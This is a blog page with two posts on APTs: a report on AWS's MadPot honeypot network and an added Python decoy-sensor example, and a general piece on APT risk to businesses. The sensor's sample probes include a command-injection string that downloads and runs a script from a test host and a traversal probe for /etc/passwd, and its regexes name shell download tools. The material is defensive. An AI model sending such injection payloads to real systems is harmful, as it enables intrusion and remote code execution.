Showing posts with label APTs.

AWS Employs MadPot Decoy System to Thwart APTs and Botnets


Amazon Web Services (AWS) has described its internal decoy system, MadPot, which has been used to lure and trap malicious activity, including operations by nation-state Advanced Persistent Threats (APTs) such as Volt Typhoon and Sandworm.

Conceived by AWS software engineer Nima Sharifi Mehr, MadPot is a network of monitoring sensors (honeypots) with automated response capabilities. The system ensnares malicious actors, records their actions, and generates protective data that feeds various AWS security products.

MadPot is designed to mimic a large number of plausible targets. AWS credits it with disrupting Distributed Denial of Service (DDoS) botnets and with blocking threat actors such as Sandworm before they could compromise AWS customers.

According to AWS, the sensors observe roughly 100 million potential threat interactions and probes per day worldwide, of which about 500,000 are classified as malicious. That telemetry is analyzed to produce actionable intelligence on harmful online activity.

The response capabilities automatically protect the AWS network from identified threats, and AWS also contacts other companies whose infrastructure is being abused for malicious purposes.

In the Sandworm case, the honeypot intercepted the actor's attempt to exploit a vulnerability in WatchGuard network security appliances. Beyond IP addresses, AWS identified other distinct attributes linked to the Sandworm infrastructure involved in the attempted breach of an AWS customer.

Because MadPot simulates a range of services and sustains extended interactions with attackers, AWS gathered further insight into Sandworm campaigns, including the specific services the actor targeted and the post-exploitation commands it issued. With that intelligence, AWS promptly informed the affected customer, who patched the vulnerability.
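To make the decoy-sensor idea concrete (sensors that imitate a plausible target, record what each source sends, and turn tagged interactions into protective data such as a blocklist and the payload hosts attackers tried to reach), here is a small low-interaction HTTP honeypot. It is an added example written for this page; it is not AWS code and is not how MadPot is implemented. The detection heuristics, the decoy login page, the sample probes and the RFC 5737 test addresses are all constructed for the example.

```python
"""Low-interaction HTTP decoy that turns probes into protective data.

Added example, not AWS code and not MadPot: answers every request with a
plausible admin login page, records what each source sends, tags requests
with a few illustrative heuristics, and derives a blocklist of tagged
sources plus the URLs those requests tried to fetch (second-stage hosts).
"""
import json
import re
import socket
import threading
from datetime import datetime, timezone
from urllib.parse import unquote

# Illustrative heuristics (assumptions for this example, not a published signature set).
SUSPICIOUS = [
    ("path_traversal", re.compile(r"(?:\.\./){2,}")),
    ("command_injection", re.compile(r"[;|&`]\s*(?:wget|curl|sh|bash|nc|chmod|rm)\s")),
    ("post_exploitation", re.compile(r"(?:uname -a|whoami|/etc/passwd|/tmp/[\w.]+)")),
]
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/[\w.\-/]*")

DECOY_BODY = (b"<html><head><title>Admin Login</title></head><body>"
              b"<form method='post' action='/login'><input name='user'>"
              b"<input name='pass' type='password'><input type='submit'>"
              b"</form></body></html>")


def parse_request(raw: bytes) -> dict:
    """Parse request line, headers and body; never raise on malformed input."""
    text = raw.decode("latin-1")
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0] if parts else "",
            "path": unquote(parts[1]) if len(parts) > 1 else "",
            "headers": headers, "body": unquote(body)}


def classify(req: dict) -> list:
    """Names of every heuristic that fires on the path, headers or body."""
    haystack = " ".join([req["path"], req["body"], *req["headers"].values()])
    return [name for name, rx in SUSPICIOUS if rx.search(haystack)]


class Sensor:
    """Collects events from one decoy and maintains the derived blocklist."""

    def __init__(self):
        self.events = []
        self.blocklist = set()   # sources that sent a tagged request
        self.indicators = set()  # URLs tagged requests tried to pull in
        self._lock = threading.Lock()

    def record(self, src_ip: str, raw: bytes) -> dict:
        req = parse_request(raw)
        tags = classify(req)
        event = {"ts": datetime.now(timezone.utc).isoformat(), "src": src_ip,
                 "method": req["method"], "path": req["path"],
                 "user_agent": req["headers"].get("user-agent", ""), "tags": tags,
                 "urls": URL_RE.findall(req["path"] + " " + req["body"])}
        with self._lock:
            self.events.append(event)
            if tags:
                self.blocklist.add(src_ip)
                self.indicators.update(event["urls"])
        return event

    def handle(self, conn: socket.socket, addr) -> None:
        conn.settimeout(5)
        try:
            raw = conn.recv(8192)
            if raw:
                print(json.dumps(self.record(addr[0], raw)))
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                             b"Content-Length: %d\r\nConnection: close\r\n\r\n"
                             % len(DECOY_BODY) + DECOY_BODY)
        except OSError:
            pass
        finally:
            conn.close()

    def serve(self, host: str = "0.0.0.0", port: int = 8080) -> None:
        """Blocking accept loop; one thread per connection."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind((host, port))
            srv.listen(64)
            while True:
                conn, addr = srv.accept()
                threading.Thread(target=self.handle, args=(conn, addr), daemon=True).start()


# Constructed sample probes (not captured traffic); sources are RFC 5737 test addresses.
PROBE_BENIGN = b"GET / HTTP/1.1\r\nHost: decoy\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
PROBE_TRAVERSAL = b"GET /cgi-bin/../../../../etc/passwd HTTP/1.1\r\nHost: decoy\r\n\r\n"
_RCE_BODY = b"user=admin;wget http://203.0.113.5/x.sh -O /tmp/x.sh;sh /tmp/x.sh"
PROBE_RCE = (b"POST /login HTTP/1.1\r\nHost: decoy\r\nContent-Length: %d\r\n\r\n"
             % len(_RCE_BODY)) + _RCE_BODY


def run_samples() -> Sensor:
    """Feed the constructed probes through one sensor and return it for inspection."""
    sensor = Sensor()
    sensor.record("198.51.100.10", PROBE_BENIGN)
    sensor.record("198.51.100.20", PROBE_TRAVERSAL)
    sensor.record("198.51.100.30", PROBE_RCE)
    return sensor


if __name__ == "__main__":
    s = run_samples()
    print("blocklist:", sorted(s.blocklist), "indicators:", sorted(s.indicators))
    Sensor().serve()
```

Run stand-alone it first replays the three constructed probes (the benign request produces an event but no tag; the traversal and command-injection probes land their sources on the blocklist and surface the payload URL as an indicator), then listens on port 8080. The point of the design is the one the post makes: the value of a decoy is not the page it serves but the structured events and derived indicators that can be pushed into blocking controls or handed to whoever owns the abused infrastructure.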

AWS also states that the data and insights gathered by MadPot are used to improve its protective services, including AWS WAF, AWS Shield, AWS Network Firewall, and Amazon Route 53 Resolver DNS Firewall, as well as its detective and reactive services such as Amazon GuardDuty, AWS Security Hub, and Amazon Inspector.

Is Your Business At Risk From APT Threats?


In 2022, organizations are re-evaluating their cybersecurity measures to reduce risk and defend against attacks. Beyond budgeting, risk assessment and compliance, each organization sets its own security priorities, but every business should weigh two categories of threat: nation-state and Advanced Persistent Threat (APT) style attacks, and the growing volume of ransomware, zero-day exploitation and phishing.

How do APTs select targets?

Your company may not have suffered a cyberattack in the past year, but there is a good chance that a partner or vendor in your supply chain has. APTs are typically used for operations with national-level impact: intellectual property theft, espionage for national intelligence, or compromise of infrastructure. In the end, the threat actor's goals affect organizations and individuals of prominence. In recent years, state-sponsored attacks have focused on intelligence collection; they may be industry-focused, but most target critical infrastructure. The majority are directed by government organizations, whose operators exploit security vulnerabilities to extract sensitive intelligence.

Should your business be concerned? 
Hacking campaigns that took months of planning and deep technical skill to bypass defenses and penetrate networks were once within reach only of state-sponsored groups. Today the same methods are available to anyone: the tooling is sold on the dark web as hired services or pre-packaged malware. The style of APT attacks has not changed, but the tools needed to launch them are now widely accessible.

With remote work, organizations are moving important data to the cloud, which widens the attack surface available to threat actors. According to HelpNet Security, "the most important way to protect against APTs is to be proactive. Assume compromise, understand what compromise may look like for your organization, and go look for it. Simultaneously, try to not over-rely on technology. This approach has backfired on a variety of occasions over the last few years."